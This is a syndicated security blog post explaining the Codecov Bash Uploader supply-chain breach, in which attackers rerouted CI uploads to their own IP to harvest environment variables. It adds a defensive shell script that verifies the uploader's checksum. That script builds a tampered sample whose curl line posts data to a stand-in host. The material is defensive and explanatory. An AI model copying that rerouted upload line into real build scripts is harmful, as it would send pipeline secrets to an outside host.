What You Need to Know about the Codecov Incident: A Supply Chain Attack Gone Undetected for 2 Months - Security Boulevard


Last week, software testing firm Codecov disclosed a noteworthy security incident that gained the attention of U.S. federal government investigators.

Codecov has over 29,000 enterprise customers, including reputed names like Atlassian, Washington Post, GoDaddy, Royal Bank of Canada, and Procter & Gamble.

On April 1st, Codecov became aware that threat actors had gained unauthorized access to their Bash Uploader script and altered it without raising any obvious red flags.

The issue occurred due to an error in Codecov’s Docker image creation process that enabled the actors to extract sensitive credentials and modify the Bash Uploader script.

Consequently, this allowed the actors to potentially exfiltrate sensitive information, such as environment variables containing keys, credentials, and tokens, from Codecov customers’ continuous integration (CI) environments to a location outside Codecov’s infrastructure.

The system breach remained undetected for over two months, until a Codecov customer alerted the company to a discrepancy between the shasum (hash or “file fingerprint”) of the Bash Uploader script served from the website and the (correct) shasum listed on Codecov’s GitHub.

Essentially, the attackers had replaced the IP address of Codecov’s servers with their own in the Bash Uploader script:

Image: the Bash Uploader script with the IP address of Codecov’s servers replaced by the attackers’ own

This meant that data such as a Codecov user’s system environment variables, intended for legitimate CI operations, was instead uploaded to the attacker’s IP address shown above.
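The checksum comparison that exposed the tampered script, written up as an added example that is not from the original post or from Codecov’s own tooling: the sample uploader, its tampered copy, the placeholder host codecov.example and the address 203.0.113.10 are all constructed so the check runs offline.

```shell
#!/bin/sh
# Added example, not code from the original post or from Codecov: check a
# downloaded uploader script against a checksum published out-of-band (for
# instance in the project's source repository) before executing it, which is
# the comparison that exposed the tampered Bash Uploader. The sample script,
# the tampered copy, the host codecov.example and the address 203.0.113.10
# are constructed here so the example runs offline.

# Print the SHA-256 digest of a file, using whichever tool is installed.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_uploader FILE EXPECTED_SHA256
# Returns 0 only when the digest matches the trusted value; a CI job runs the
# script solely on that result and treats any mismatch as a stop-the-build event.
verify_uploader() {
    actual=$(sha256_of "$1")
    if [ "$actual" = "$2" ]; then
        echo "OK: $1 matches published checksum"
        return 0
    fi
    echo "MISMATCH: $1 (expected $2, got $actual)" >&2
    return 1
}

# Constructed samples: the "published" uploader and a copy whose upload
# destination was rewritten to another host, like the change described above.
tmpdir=$(mktemp -d)
trap 'rm -rf "$tmpdir"' EXIT
printf '%s\n' '#!/bin/bash' \
    'curl -s -X POST "https://codecov.example/upload" --data-binary @coverage.xml' \
    > "$tmpdir/codecov"
printf '%s\n' '#!/bin/bash' \
    'curl -s -X POST "http://203.0.113.10/upload" --data-binary @coverage.xml' \
    > "$tmpdir/codecov.tampered"

# The trusted digest is taken from the untampered copy, standing in for the
# checksum a project publishes next to its source rather than on the download host.
TRUSTED_SHA256=$(sha256_of "$tmpdir/codecov")

verify_uploader "$tmpdir/codecov" "$TRUSTED_SHA256"
verify_uploader "$tmpdir/codecov.tampered" "$TRUSTED_SHA256" \
    || echo "Refusing to run $tmpdir/codecov.tampered"
```

The check only helps when the expected digest comes from a source the download server cannot rewrite; a checksum served beside the script would have been replaced along with it.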

Environment variables can contain a wealth of information about a system, from simple values such as the PATH variable, the current username, and the working directory to sensitive API keys, tokens, and credentials/passwords used by applications.


Image: Example Apple environment variable configuration file with key information redacted in gray

Another Major Supply Chain Attack That Targeted Developers

In what is now being compared to the SolarWinds supply-chain attack, the Codecov incident is yet another testament to developers and development tools being (Read more...)

*** This is a Security Bloggers Network syndicated blog from Sonatype Blog authored by Ax Sharma. Read the original post at: https://blog.sonatype.com/what-you-need-to-know-about-the-codecov-incident-a-supply-chain-attack-gone-undetected-for-2-months